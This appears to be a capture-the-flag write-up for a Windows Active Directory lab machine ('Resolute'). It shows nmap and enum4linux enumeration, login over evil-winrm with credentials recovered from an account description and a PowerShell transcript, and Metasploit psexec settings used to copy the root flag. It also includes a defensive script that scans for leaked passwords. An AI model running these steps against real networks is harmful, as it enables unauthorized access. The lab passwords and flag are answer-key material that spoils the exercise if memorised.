```
$ cat nmap_A.nmap
# Nmap 7.80 scan initiated Fri Mar 20 17:46:45 2020 as: nmap -A -p- -oA nmap_A -v 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up (0.028s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-20 16:55:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49709/tcp open  msrpc        Microsoft Windows RPC
51347/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/20%Time=5E74F396%P=x86_64-unknown-linux-gnu%r
SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver
SF:sion\x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h28m28s, deviation: 4h02m29s, median: 8m27s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-03-20T09:57:01-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-03-20T16:57:03
|_  start_date: 2020-03-19T21:50:57

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 20 17:50:47 2020 -- 1 IP address (1 host up) scanned in 242.33 seconds
```
We have a Windows machine with SMB, LDAP, WinRM, etc. exposed.
So I'll see if crackmapexec can find the same information as the
smb-os-discovery nmap script (NSE).
BlackArch: pacman -S crackmapexec
```
$ cme smb 10.10.10.169
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK) (signing:True) (SMBv1:True)
```
Okay fine, SMB looks like a good place to start, so I'll use enum4linux
to enumerate information over SMB.
```
 ============================================ 
|    Nbtstat Information for 10.10.10.169    |
 ============================================ 
Looking up status of 10.10.10.169
No reply from 10.10.10.169

 ===================================== 
|    Session Check on 10.10.10.169    |
 ===================================== 
[+] Server 10.10.10.169 allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.169    |
 =========================================== 
Unable to initialize messaging context
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.169    |
 ====================================== 
[+] Got OS info for 10.10.10.169 from smbclient: 
[+] Got OS info for 10.10.10.169 from srvinfo:
Unable to initialize messaging context
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ========================================= 
|    Share Enumeration on 10.10.10.169    |
 ========================================= 
Unable to initialize messaging context
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

 ==================================================== 
|    Password Policy Information for 10.10.10.169    |
 ==================================================== 
[E] Unexpected error from polenum:

[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Group 'DnsAdmins' (RID: 1101) has member: Couldn't lookup SIDs

[+] Getting domain group memberships:
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator
Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator
Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$
Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan
Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator
Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki

 ======================================================================= 
|    Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================= 
|    Getting printer info for 10.10.10.169    |
 ============================================= 
Unable to initialize messaging context
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Fri Mar 20 21:21:35 2020
```
We have what seems to be a default password and a list of users.
```
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko	Name: Marko Novak	Desc: Account created. Password set to Welcome123!
```
System enumeration, elevation of privilege: melanie to ryan
TL;DR: creds leaked in a file
Let's see local users on the machine:
```
*Evil-WinRM* PS C:\Users\melanie> net user

User accounts for \\

-------------------------------------------------------------------------------
abigail                  Administrator            angela
annette                  annika                   claire
claude                   DefaultAccount           felicia
fred                     Guest                    gustavo
krbtgt                   marcus                   marko
melanie                  naoki                    paulo
per                      ryan                     sally
simon                    steve                    stevie
sunita                   ulf                      zach
The command completed with one or more errors.
```
Let's check the groups of a few users; maybe we can learn more than we did with
enum4linux:
```
*Evil-WinRM* PS C:\Users\melanie> net user melanie
User name                    melanie
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/20/2020 2:46:11 PM
Password expires             Never
Password changeable          3/21/2020 2:46:11 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
```
Our user melanie doesn't seem very privileged. Let's see about ryan:
```
*Evil-WinRM* PS C:\Users\melanie> net user ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/20/2020 2:46:10 PM
Password expires             Never
Password changeable          3/21/2020 2:46:10 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.
```
ryan is in the Contractors group, so he may be a more interesting target.
Then I did some file enumeration on the file system and found there was a
PSTranscripts folder in C:\ with a promising text file inside:
```
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
```
As you can see, the transcript logs leak credentials: ryan / Serv3r4Admin4cc123!. PowerShell transcription records every command line verbatim, so a password passed as a command-line argument ends up on disk in the transcript file.
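Both leaks found so far, the password announced in marko's account description and the one recorded in the PSTranscripts file, are clear-text secrets sitting in text that a defender can audit. The following scanner is an added example written for this post (not code from the writeup or from any of the tools used here); the transcript fragment, the description strings and the two regexes are constructed assumptions modelled on the findings above.

```python
import re

# Constructed samples modelled on the two findings above (not the real
# files from the box): a PowerShell transcript fragment whose recorded
# command line carries a password, and two account description fields.
SAMPLE_TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Username: MEGABANK\\ryan
**********************
PS>cmd /c net use X: \\\\fs01\\backups ryan Serv3r4Admin4cc123!
PS>Get-ChildItem C:\\Users
"""
SAMPLE_DESCRIPTIONS = {
    "marko": "Account created. Password set to Welcome123!",
    "ryan": "Contractor account",
}

# Transcription writes every command line to disk verbatim, so a password
# given as a positional argument to `net use <drive> \\server\share <user>
# <password>` (or after `/user:<name>`) ends up in the log. Only those two
# argument orders are handled; that is an assumption of this check.
NET_USE_RE = re.compile(
    r"(net\s+use\s+\S+\s+\\\\\S+\s+(?:/user:)?\S+\s+)(\S+)", re.IGNORECASE)
# Description attributes that announce a password in clear text (heuristic).
DESC_RE = re.compile(r"\bpass(?:word)?\b.*?(?:set to|is|:)\s*\S+", re.IGNORECASE)


def find_transcript_secrets(text):
    """Return (line number, redacted line) for each transcript line that
    carries a password, so the finding can be reported without re-leaking it."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        if NET_USE_RE.search(line):
            hits.append((number, NET_USE_RE.sub(r"\1<REDACTED>", line)))
    return hits


def find_description_secrets(descriptions):
    """Return the account names whose description field announces a password."""
    return sorted(name for name, desc in descriptions.items()
                  if DESC_RE.search(desc))


if __name__ == "__main__":
    for number, line in find_transcript_secrets(SAMPLE_TRANSCRIPT):
        print(f"transcript line {number}: {line}")
    print("accounts with a password in their description:",
          find_description_secrets(SAMPLE_DESCRIPTIONS))
```

In practice the same two functions would be fed the real transcript directory and the `description` attribute pulled from the directory for every account; a hit in either place is a credential to rotate and a logging or provisioning practice to fix.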
System elevation of privilege: ryan to administrator
TL;DR: I got lucky; it should have been a DNS service EoP
We can connect as ryan using evil-winrm, but as a note on the
desktop tells us, the connection will be reset every minute.
```
$ evil-winrm -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan> type Desktop/note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
```
As our shell is reverted too quickly, we have to find another way to elevate our
privileges. Let's see with crackmapexec if there are some interesting
shares:
I found that the C$ share was writable by ryan, so we can use the Metasploit
psexec exploit to execute commands. Getting a shell would be useless
because of the 1-minute limit, so let's just copy the flag into ryan's home directory.
It seems ryan has admin privileges.
```
Name                  Current Setting                                                              Required  Description
----                  ---------------                                                              --------  -----------
COMMAND               copy C:\Users\Administrator\Desktop\root.txt C:\Users\ryan\Videos\noraj.txt  yes       The command you want to execute on the remote host
RHOSTS                10.10.10.169                                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT                 445                                                                          yes       The Target port
SERVICE_DESCRIPTION                                                                                no        Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME                                                                               no        The service display name
SERVICE_NAME                                                                                       no        The service name
SMBDomain             MEGABANK                                                                     no        The Windows domain to use for authentication
SMBPass               Serv3r4Admin4cc123!                                                          no        The password for the specified username
SMBSHARE              C$                                                                           yes       The name of a writeable share on the server
SMBUser               ryan                                                                         no        The username to authenticate as
THREADS               1                                                                            yes       The number of concurrent threads (max one per host)
WINPATH               Users\ryan\Videos                                                            yes       The name of the remote Windows directory
```
```
*Evil-WinRM* PS C:\Users\ryan\Videos> type noraj.txt
e1d94876a506850d0c20edb5405e619c
```